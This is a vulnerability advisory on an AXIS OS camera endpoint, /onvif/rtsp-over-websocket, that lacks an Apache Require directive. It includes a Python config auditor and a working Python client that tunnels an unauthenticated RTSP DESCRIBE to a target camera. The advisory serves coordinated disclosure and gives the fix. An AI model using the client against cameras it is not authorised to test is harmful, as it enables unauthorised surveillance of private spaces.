AXIS OS ONVIF RTSP-over-WebSocket Endpoint Missing Authentication
Two WebSocket-to-RTSP proxy endpoints, functionally identical, sit side by side in Apache config. One has a Require directive. The ONVIF variant does not.
AXIS OS exposes two WebSocket-to-RTSP proxy endpoints on camera devices. The standard endpoint at /rtsp-over-websocket (configured in tcpproxy_rtsp.conf) requires axis-rtsp-ws-session authentication. The ONVIF variant at /onvif/rtsp-over-websocket (configured in tcpproxy_rtsp_onvif.conf) is missing the Require directive entirely.
Both configuration files are included in every VirtualHost via conf.d/vhosts/all/, so the ONVIF endpoint is reachable on the externally-facing VirtualHost. In Apache 2.4, a <Location> section that carries no Require directive grants access. An unauthenticated attacker who can reach the camera's web interface can therefore tunnel RTSP commands through the ONVIF WebSocket endpoint, obtain live video and audio, and conduct surveillance without credentials.
The finding was identified through static analysis of the extracted firmware Apache configuration.
An unauthenticated attacker on the same network as the camera can connect to ws://CAMERA_IP/onvif/rtsp-over-websocket using the rtsp.onvif.org WebSocket subprotocol, tunnel RTSP DESCRIBE/SETUP/PLAY commands, and receive the live video and audio stream with no credentials.
This is a complete bypass of video stream authentication. Where cameras cover private or sensitive areas it enables unauthorized surveillance, and an attacker who enumerates cameras through ONVIF discovery or mDNS can pull streams from every network-reachable camera in a deployment.
The parent VirtualHost applies authentication in a <Directory "/usr/html"> section. Apache matches <Directory> sections against the filesystem path a request resolves to and <Location> sections against the request URL; the two are configured independently of each other. Because the WebSocket handler takes over the connection rather than serving a file under /usr/html, the directory-level authentication does not cover this request, and with no Require of its own in the <Location> block, Apache 2.4 grants access by default.
The non-ONVIF configuration file (tcpproxy_rtsp.conf) has the correct directive:
<Location /rtsp-over-websocket>
...
Require axis-rtsp-ws-session
</Location>
The ONVIF file (tcpproxy_rtsp_onvif.conf) is identical in structure except it is missing that one line:
<Location /onvif/rtsp-over-websocket>
...
SetHandler websocket-handler
(no Require directive)
</Location>
The fix is one line in tcpproxy_rtsp_onvif.conf.
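The static check that surfaces this class of gap, as an added example written for this page (not the reporter's tooling or AXIS code): a small Python auditor that walks Apache config text, tracks nested sections, and reports every <Location> block that carries no Require directive of its own. The two embedded samples are constructed from the excerpts above (the directive lines are the ones shown on this page); the script name, function names and the directory-walk convention are assumptions.

```python
"""Added example (not the advisory's or AXIS's code): static audit of Apache config text for
<Location> sections that carry no Require directive of their own, the gap the write-up found.
Run on an extracted firmware tree: python3 audit_require.py /path/to/rootfs/etc/httpd
"""
import pathlib
import re
import sys

# Constructed samples mirroring the two excerpts in the write-up (directives as shown there).
TCPPROXY_RTSP_CONF = """\
<Location /rtsp-over-websocket>
    WebSockServProvTCPAddr localhost
    WebSockServProvTCP6Addr ip6-localhost
    WebSockServProvTCPPort RTSP
    SetHandler websocket-handler
    Require axis-rtsp-ws-session
</Location>
"""
TCPPROXY_RTSP_ONVIF_CONF = """\
<Location /onvif/rtsp-over-websocket>
    WebSockServProvTCPAddr localhost
    WebSockServProvTCP6Addr ip6-localhost
    WebSockServProvTCPPort RTSP
    WebSockSubProt rtsp.onvif.org
    WebSockTCPTimeout 60
    SetHandler websocket-handler
</Location>
"""

OPEN_RE = re.compile(r"^<(\w+)\b([^>]*)>$")        # <Location /x>, <RequireAll>, <Directory "/a">
CLOSE_RE = re.compile(r"^</(\w+)\s*>$")            # </Location>
REQUIRE_RE = re.compile(r"^Require\s+\S", re.I)    # Require all granted / Require valid-user / ...
AUTHZ_CONTAINERS = {"requireall", "requireany", "requirenone"}
LOCATION_SECTIONS = {"location", "locationmatch"}

def find_location_blocks(text):
    """Return [{"path", "line", "has_require"}] for every <Location>/<LocationMatch> in the text.

    A Require directive, or a <RequireAll>/<RequireAny>/<RequireNone> container, counts only
    for the innermost section it sits in, so a Require inside a nested <Files> does not
    protect the enclosing <Location>.
    """
    blocks, stack = [], []                          # stack entries: [name, argument, has_require, line]
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):        # Apache comments are whole lines only
            continue
        if m := OPEN_RE.match(line):
            name = m.group(1).lower()
            if name in AUTHZ_CONTAINERS and stack:
                stack[-1][2] = True
            stack.append([name, m.group(2).strip().strip('"'), False, lineno])
        elif (m := CLOSE_RE.match(line)) and stack and stack[-1][0] == m.group(1).lower():
            name, arg, has_require, start = stack.pop()
            if name in LOCATION_SECTIONS:
                blocks.append({"path": arg, "line": start, "has_require": has_require})
        elif REQUIRE_RE.match(line) and stack:
            stack[-1][2] = True
    return blocks

def unprotected_locations(text):
    """Paths of <Location> blocks with no Require of their own, in file order."""
    return [b["path"] for b in find_location_blocks(text) if not b["has_require"]]

def audit_tree(root):
    """Map each *.conf file under root to its unprotected Location paths (files with none omitted)."""
    findings = {}
    for conf in sorted(pathlib.Path(root).rglob("*.conf")):
        paths = unprotected_locations(conf.read_text(errors="replace"))
        if paths:
            findings[str(conf)] = paths
    return findings

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for conf, paths in audit_tree(sys.argv[1]).items():
            print(f"{conf}: no Require in <Location> for {', '.join(paths)}")
    else:                                           # no argument: audit the constructed samples
        for name, text in (("tcpproxy_rtsp.conf", TCPPROXY_RTSP_CONF),
                           ("tcpproxy_rtsp_onvif.conf", TCPPROXY_RTSP_ONVIF_CONF)):
            print(f"{name}: {unprotected_locations(text) or 'all Location blocks have Require'}")
```

Run without arguments it reports /onvif/rtsp-over-websocket for the ONVIF sample and nothing for the other; pointed at an extracted firmware tree it lists every .conf file with an unprotected <Location>. Treat each hit as a candidate to verify against the enclosing VirtualHost and <Directory> configuration, as the write-up did for this one, rather than as a confirmed bypass on its own.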
The following reproduces the finding. Replace CAMERA_IP with the target device's address.
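What follows is an added check written for this page, not the reporter's own reproduction material: a stdlib-only Python client that performs the WebSocket upgrade against /onvif/rtsp-over-websocket with the rtsp.onvif.org subprotocol, tunnels a single RTSP DESCRIBE with no credentials, and classifies the reply. The stream path axis-media/media.amp is an assumption (pass the device's actual RTSP path as the third argument), as are the script name and function names.

```python
"""Added check (not from the advisory): does an RTSP-over-WebSocket endpoint answer RTSP with no credentials?
Stdlib only: a minimal RFC 6455 client (handshake plus masked text frames) tunnelling one RTSP DESCRIBE.
"""
import base64
import hashlib
import os
import socket
import struct
import sys

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # RFC 6455 Sec-WebSocket-Accept constant
ONVIF_PATH = "/onvif/rtsp-over-websocket"
SUBPROTOCOL = "rtsp.onvif.org"
DEFAULT_STREAM = "axis-media/media.amp"           # assumed stream path; not stated in the write-up

def build_rtsp_request(method, url, cseq):
    """One RTSP/1.0 request with no Authorization header: that absence is what we test."""
    return f"{method} {url} RTSP/1.0\r\nCSeq: {cseq}\r\nUser-Agent: ws-rtsp-check\r\n\r\n"

def parse_rtsp_status(response):
    """Return (code, reason) from an RTSP status line, or None if the reply is not RTSP."""
    parts = response.split("\r\n", 1)[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("RTSP/") or not parts[1].isdigit():
        return None
    return int(parts[1]), (parts[2] if len(parts) > 2 else "")

def classify(status):
    """Map the RTSP reply to the finding: a 200 with no credentials is the bug."""
    if status is None:
        return "no RTSP reply (endpoint absent or not proxying RTSP)"
    if status[0] == 200:
        return "VULNERABLE: RTSP answered DESCRIBE without credentials"
    if status[0] == 401:
        return "auth enforced: RTSP backend demanded credentials (401)"
    return f"inconclusive: RTSP {status[0]} {status[1]}".rstrip()

def ws_encode_text(payload, mask=None):
    """Client text frame (FIN, opcode 1), masked as RFC 6455 requires; payloads up to 64 KiB."""
    mask, n = mask or os.urandom(4), len(payload)
    header = bytes([0x81, 0x80 | n]) if n < 126 else bytes([0x81, 0xFE]) + struct.pack("!H", n)
    return header + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(payload))

def ws_decode_frame(data):
    """Decode one frame, masked or not: (opcode, payload, bytes_consumed), or None if incomplete."""
    if len(data) < 2:
        return None
    opcode, masked, n, pos = data[0] & 0x0F, data[1] & 0x80, data[1] & 0x7F, 2
    if n == 126 and len(data) >= 4:
        n, pos = struct.unpack("!H", data[2:4])[0], 4
    elif n == 127 and len(data) >= 10:
        n, pos = struct.unpack("!Q", data[2:10])[0], 10
    elif n >= 126:
        return None
    mask, pos = (data[pos:pos + 4], pos + 4) if masked else (b"\0\0\0\0", pos)
    if len(data) < pos + n:
        return None
    return opcode, bytes(b ^ mask[i % 4] for i, b in enumerate(data[pos:pos + n])), pos + n

def ws_handshake(sock, host, path):
    """HTTP Upgrade requesting the rtsp.onvif.org subprotocol; returns (status line, leftover bytes)."""
    key = base64.b64encode(os.urandom(16)).decode()
    sock.sendall((f"GET {path} HTTP/1.1\r\nHost: {host}\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
                  f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n"
                  f"Sec-WebSocket-Protocol: {SUBPROTOCOL}\r\n\r\n").encode())
    resp = b""
    while b"\r\n\r\n" not in resp and (chunk := sock.recv(4096)):
        resp += chunk
    head, _, leftover = resp.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n")[0].decode(errors="replace")
    accept = base64.b64encode(hashlib.sha1((key + WS_GUID).encode()).digest()).decode()
    if status_line.startswith("HTTP/1.1 101") and accept.encode() not in head:
        raise ConnectionError("101 with a wrong Sec-WebSocket-Accept: not a WebSocket upgrade")
    return status_line, leftover

def check_endpoint(host, path=ONVIF_PATH, stream=DEFAULT_STREAM, port=80, timeout=5):
    """Open the WebSocket, tunnel one unauthenticated DESCRIBE and classify the RTSP reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        status_line, buf = ws_handshake(sock, host, path)
        if not status_line.startswith("HTTP/1.1 101"):
            return f"upgrade refused ({status_line or 'connection closed'}); a 401 here means Require is in place"
        sock.sendall(ws_encode_text(build_rtsp_request("DESCRIBE", f"rtsp://{host}/{stream}", 1).encode()))
        text = ""
        while "\r\n\r\n" not in text:
            frame = ws_decode_frame(buf)
            if frame is None:                       # need more bytes for a whole frame
                chunk = sock.recv(4096)
                if not chunk:
                    break
                buf += chunk
                continue
            opcode, payload, used = frame
            buf = buf[used:]
            if opcode == 0x8:                       # server sent Close
                break
            text += payload.decode(errors="replace") if opcode <= 0x2 else ""  # skip ping/pong
        return classify(parse_rtsp_status(text))

if __name__ == "__main__":
    print(check_endpoint(sys.argv[1], *sys.argv[2:4]))
```

Run as python3 ws_rtsp_check.py CAMERA_IP, optionally followed by the WebSocket path and the RTSP stream path. A 101 upgrade followed by RTSP/1.0 200 means the DESCRIBE was served with no credentials at either layer, which is the finding. An HTTP 401 at the upgrade is what the corrected configuration (Require axis-rtsp-ws-session in the ONVIF Location block) should produce. An RTSP 401 means the WebSocket layer let the connection through but the RTSP service behind the proxy still demanded credentials on its own, so the two layers should be read separately when interpreting results.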
Reported to the AXIS Security team through coordinated disclosure. The fix is to add Require axis-rtsp-ws-session to the ONVIF Location block in tcpproxy_rtsp_onvif.conf, matching the existing non-ONVIF configuration:
<Location /onvif/rtsp-over-websocket>
WebSockServProvTCPAddr localhost
WebSockServProvTCP6Addr ip6-localhost
WebSockServProvTCPPort RTSP
WebSockSubProt rtsp.onvif.org
WebSockTCPTimeout 60
SetHandler websocket-handler
Require axis-rtsp-ws-session
</Location>